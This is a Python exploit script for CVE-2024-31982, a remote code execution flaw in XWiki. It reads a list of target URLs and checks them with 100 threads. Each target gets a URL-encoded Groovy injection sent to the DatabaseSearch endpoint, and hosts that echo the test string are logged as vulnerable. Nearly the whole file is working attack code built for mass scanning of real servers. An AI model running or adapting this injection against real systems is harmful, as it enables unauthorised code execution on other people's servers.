CVE-2024-31982.py

# !/usr/bin/python3
# CVE-2024-31982
# Xwiki RCE


from random import random
import requests
import threading
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

file_lock = threading.Lock()
# WRITE_URL
def write_to_file(data):
    with file_lock:
        with open("vul_url.txt", "a+") as file:
            file.write(data + "\n")

def run(url):
    try:
        vul_url = url + """/bin/get/Main/DatabaseSearch?outputSyntax=plain&text="""
        # Command
        # }}}{{async async=false}}{{groovy}}println("Successful Injection"){{/groovy}}{{/
        vul_url += """%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Successful%20Injection%22%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2F"""
        res = requests.get(url=vul_url, proxies={'http':'http://127.0.0.1:7890'}, verify=False, timeout=10)
        # print(res.text)
        if res.status_code == 200 and 'Injection' in res.text:
            print(f"{url} is vulnerbale")
            write_to_file(url)
        
    except Exception as e:
        print(e)
        return None


max_threads = 100
semaphore = threading.Semaphore(max_threads)


class MyThread(threading.Thread):
    def __init__(self, url):
        super().__init__()
        self.url = url

    def run(self):
        try:
            run(self.url)
        except requests.exceptions.RequestException as e:
            return None
        semaphore.release()


def print_ascii_art():

    # ASCII ART SLANT
    print("""
   ______ _    __    ______          ___    ____    ___    __ __          _____   ___   ____    ____    ___ 
  / ____/| |  / /   / ____/         |__ \  / __ \  |__ \  / // /         |__  /  <  /  / __ \  ( __ )  |__ \ 
 / /     | | / /   / __/    ______  __/ / / / / /  __/ / / // /_ ______   /_ <   / /  / /_/ / / __  |  __/ /
/ /___   | |/ /   / /___   /_____/ / __/ / /_/ /  / __/ /__  __//_____/ ___/ /  / /   \__, / / /_/ /  / __/ 
\____/   |___/   /_____/          /____/ \____/  /____/   /_/          /____/  /_/   /____/  \____/  /____/ @Leviathan
                                                                                                   
    """)

def main():
    print_ascii_art()
    print("Script is running!")
    # OPEN URL FILE
    with open("new_url.txt", "r") as file:
        urls = file.readlines()
    threads = []

    for url in urls:
        semaphore.acquire()
        thread = MyThread(url.strip())
        thread.start()
        threads.append(thread)

    for thread in threads:
        thread.join()

if __name__ == "__main__":
    main()